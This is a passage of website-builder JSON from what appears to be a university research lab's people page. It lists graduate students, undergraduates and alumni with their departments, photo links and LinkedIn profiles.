Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c63\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c79\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c111\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c111\",\"index\":2,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c111\",\"index\":3,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c105\",\"index\":1,\"id\":\"182-c110\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c201\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c201\",\"index\":2,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c201\",\"index\":3,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c201\",\"index\":1,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c62\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c61\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c130\",\"parentId\":\"182-c129\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c129\",\"parentId\":\"182-c128\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c128\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c133\",\"parentId\":\"182-c132\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c134\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c133\",\"index\":2,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c133\",\"index\":1,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c207\",\"parentId\":\"182-c132\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c207\",\"index\":0,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c207\",\"index\":0,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c207\",\"index\":2,\"id\":\"182-c210\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c207\",\"index\":1,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c132\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c131\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c140\",\"parentId\":\"182-c139\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c139\",\"parentId\":\"182-c138\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c138\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c143\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c143\",\"index\":2,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c143\",\"index\":1,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c148\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c150\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c148\",\"index\":2,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c148\",\"index\":1,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c153\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c153\",\"index\":2,\"id\":\"182-c156\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c153\",\"index\":1,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c158\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c158\",\"index\":2,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 